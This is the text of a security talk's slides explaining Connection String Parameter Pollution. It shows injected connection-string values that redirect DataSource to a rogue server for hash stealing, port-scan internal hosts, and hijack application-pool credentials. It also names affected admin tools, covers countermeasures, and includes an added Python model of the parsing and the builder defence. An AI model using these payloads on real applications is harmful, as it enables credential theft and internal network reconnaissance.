Connection Strings
• Define the way an application connects to a data repository
• There are connection strings for:
  – Relational databases (MSSQL, Oracle, MySQL, …)
  – LDAP directories
  – Files (XML, plain, csv, xls, mdb, …)
  – Etc.
Database Connection Strings
Data Source=myServerAddress;
Initial Catalog=myDataBase;User Id=myUsername;
Password=myPassword;
DB Connection Build-up
Google Hacking
UDL (Universal Data Link) Files
How a Web App Connects to the DB
Operating System Accounts
Data Source=myServerAddress;
Initial Catalog=myDataBase;User Id=;
Password=;Integrated Security=SSPI/True/Yes;
Database Credentials
Data Source=myServerAddress;
Initial Catalog=myDataBase;User Id=myUsername;
Password=myPassword;Integrated Security=No;
Web Application Manages the Login Process (users authenticated by the Web App)
[Diagram: Database Engine (syslogins, custom users table) and App running on Web Server (connection string); the app issues "Select id from users".]
1.- The Web application connects to the database using its own credentials.
2.- It asks the user for login information.
3.- It checks that login information against the data stored in the custom users table.
Database Engine Manages the Login Process (users authenticated by the Database)
[Diagram: Database Engine (syslogins) and App running on Web Server (connection string).]
1.- The Web application asks the user for credentials.
2.- A connection string is composed with those credentials to connect to the database.
3.- Roles and permissions are limited to those of the user set in the connection string.
Connection String Attacks
• It's possible to inject parameters into connection strings using semicolons as a separator
Data Source=myServerAddress;
Initial Catalog=myDataBase;
Integrated Security=NO;
User Id=myUsername;
Password=myPassword;Encryption=Off;
Connection String Builder
• Available in .NET Framework 2.0
• Builds secure connection strings from parameters
• It's not possible to inject into the connection string
Are people aware of this?
Connection String Parameter Pollution
• The goal is to inject parameters into the connection string, whether they already exist in it or not
• If a parameter is duplicated, the last value wins
• This behavior allows attackers to completely overwrite the connection string, and therefore to manipulate the way the application works and how it authenticates
DB Connection Object: Pollutable Behavior
[Diagram: DB Connection Object with Param1 and Param2. Input "Param1=ValueA Param2=ValueB Param1=ValueC Param2=ValueD"; the object ends up with Param1=ValueC and Param2=ValueD.]
What Can Be Done with CSPP? Overwrite a Parameter
[Diagram: DB Connection Object with DataSource, UID and password. Input "DataSource=DB1 UID=sa DataSource=DB2 password=Pwnd!"; the object keeps DataSource=DB2.]
Scanning the DMZ
[Diagram: Internet -> FW -> Web app vulnerable to CSPP -> Production Database; alongside it sit Development Database 1, Financial Database, Test Database and a Forgotten Database, each reachable by changing the DataSource parameter.]
Port Scanning a Server
[Diagram: Internet -> FW -> Web app vulnerable to CSPP -> Production Database Server; DataSource values DB1,80 / DB1,21 / DB1,25 / DB1,1445 each probe one port.]
What Can Be Done with CSPP? Add a Parameter
[Diagram: DB Connection Object with DataSource, UID and password. Input "DataSource=DB1 UID=sa IntegratedSecurity=True password=Pwnd!"; the added IntegratedSecurity parameter is accepted.]
CSPP Attack 1: Hash Stealing
1.- Run a rogue server on an accessible IP address: Rogue_Server
2.- Activate a sniffer to catch the login process: Cain / Wireshark
3.- Overwrite the DataSource parameter: Data_Source=Rogue_Server
4.- Force Windows Integrated Authentication: IntegratedSecurity=true
CSPP Attack 1: Hash Stealing
Concatenation template:
Data source=SQL2005;initial catalog=db1;Integrated Security=no;user id=+'User_Value'+;Password=+'Password_Value'+;
Resulting connection string:
Data source=SQL2005;initial catalog=db1;Integrated Security=no;user id=;Data Source=Rogue_Server;Password=;Integrated Security=True;
CSPP 1: ASP.NET Enterprise Manager
CSPP Attack 2: Port Scanning
1.- Duplicate the DataSource parameter, setting the target server and the target port to be scanned: Data_Source=Target_Server,target_Port
2.- Check the error messages:
  - No TCP connection -> port is closed
  - No SQL Server -> port is open
  - Invalid password -> there is a SQL Server there!
CSPP Attack 2: Port Scanning
Concatenation template:
Data source=SQL2005;initial catalog=db1;Integrated Security=no;user id=+'User_Value'+;Password=+'Password_Value'+;
Resulting connection string:
Data source=SQL2005;initial catalog=db1;Integrated Security=no;user id=;Data Source=Target_Server,Target_Port;Password=;Integrated Security=True;
CSPP 2: myLittleAdmin (port is open)
CSPP 2: myLittleAdmin (port is closed)
CSPP Attack 3: Hijacking Web Credentials
1.- Duplicate the DataSource parameter, pointing it at the target SQL Server: Data_Source=Target_Server
2.- Force Windows Authentication: IntegratedSecurity=true
3.- The application pool the web app runs under will then send its own credentials in order to log into the database engine.
CSPP Attack 3: Hijacking Web Credentials
Concatenation template:
Data source=SQL2005;initial catalog=db1;Integrated Security=no;user id=+'User_Value'+;Password=+'Password_Value'+;
Resulting connection string:
Data source=SQL2005;initial catalog=db1;Integrated Security=no;user id=;Data Source=Target_Server;Password=;Integrated Security=true;
CSPP Attack 3: Web Data Administrator
CSPP Attack 3: myLittleAdmin / myLittleBackup
CSPP Attack 3: ASP.NET Enterprise Manager
Other Databases
• MySQL
  – Does not support Integrated Security
  – It's still possible to manipulate the behavior of the web application:
    • Port scanning
    • Connecting to internal / testing / development databases
    • Stealing credentials
• Oracle supports integrated authentication on Windows and UNIX/Linux servers
  – It's possible to perform all of the described attacks:
    • Hash stealing
    • Port scanning
    • Hijacking Web credentials
  – It's also possible to elevate a connection to sysdba in order to shut down / start up an instance
Demo
Scanner
• Proof of concept to test your own network
• Tries a hijacking-web-credentials attack
• Written in ASP.NET C#
• Free download (code included, of course): http://www.informatica64.com/csppScanner.aspx
CSPP Scanner
CSPP Scanner: Attacks
Demo
myLittleAdmin / myLittleBackup
myLittleTools released a security advisory and a patch about this
ASP.NET Enterprise Manager
• ASP.NET Enterprise Manager is "abandoned", but it's still being used in a lot of web control panels.
• Fix the code yourself
ASP.NET Web Data Administrator
ASP.NET Web Data Administrator is secure on the CodePlex website, but not on the Microsoft website, where an insecure old version was published.
Countermeasures
• Harden your firewall
  – Outbound connections
• Review your internal accounts policy
  – Web application
  – Web server
  – Database engine
• Use ConnectionStringBuilder
• Filter the ;)
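The following block is an added example, not code from the slides, and it serves two passages: the "last value wins" behavior described under Connection String Parameter Pollution, and the ConnectionStringBuilder and filter-the-semicolon countermeasures above. It is a simplified Python model of how ADO.NET splits a connection string and how SqlConnectionStringBuilder quotes values, not Microsoft's implementation; the payload reuses the slides' Rogue_Server example as constructed input.

```python
# Added example (not code from the slides): a simplified model of how ADO.NET
# splits a connection string and how SqlConnectionStringBuilder quotes values,
# showing why "last value wins" enables CSPP and why the builder defeats it.
import re

_TOKEN = re.compile(r'\s*([^=;]+?)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^;]*))\s*(?:;|$)')

def parse_connection_string(conn):
    """Keys are case-insensitive with spaces ignored; a repeated key wins."""
    params, pos = {}, 0
    while pos < len(conn):
        m = _TOKEN.match(conn, pos)
        if not m:
            raise ValueError(f"malformed connection string near offset {pos}")
        key = m.group(1).replace(" ", "").lower()
        params[key] = next(v for v in m.groups()[1:] if v is not None)
        pos = m.end()  # a duplicate key simply overwrote the earlier value
    return params

def quote_value(value):
    """Quote like DbConnectionStringBuilder when a value holds ';' or a quote,
    so the separator cannot start a new parameter (both quote kinds: rejected)."""
    if not any(c in value for c in ';"\'') and value == value.strip():
        return value
    if '"' not in value:
        return f'"{value}"'
    if "'" not in value:
        return f"'{value}'"
    raise ValueError("value contains both quote characters")

def build_by_concatenation(user, password):
    """Vulnerable pattern from the slides: input spliced into the template."""
    return ("Data Source=SQL2005;Initial Catalog=db1;Integrated Security=no;"
            f"User Id={user};Password={password};")

def build_with_builder(server, database, user, password):
    """Countermeasure: each field is a parameter and every value is quoted."""
    fields = [("Data Source", server), ("Initial Catalog", database),
              ("Integrated Security", "No"), ("User Id", user), ("Password", password)]
    return ";".join(f"{k}={quote_value(v)}" for k, v in fields) + ";"

def contains_separator(value):
    return ";" in value  # the 'filter the ;' countermeasure applied to input

if __name__ == "__main__":
    # Constructed input reusing the slides' hash-stealing payload.
    user, pwd = ";Data Source=Rogue_Server", ";Integrated Security=True"
    print(parse_connection_string(build_by_concatenation(user, pwd)))
    print(parse_connection_string(build_with_builder("SQL2005", "db1", user, pwd)))
```

With concatenation the parsed DataSource becomes Rogue_Server and Integrated Security becomes True; with the builder both stay at their intended values and the payload remains inside the quoted User Id and Password fields.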
Questions?
Contact
Chema Alonso
chema@informatica64.com
http://www.informatica64.com
http://elladodelmal.blogspot.com
http://twitter.com/chemaalonso
Authors
Chema Alonso, Manuel Fernández "The Sur", Alejandro Martín Bailón, Antonio Guzmán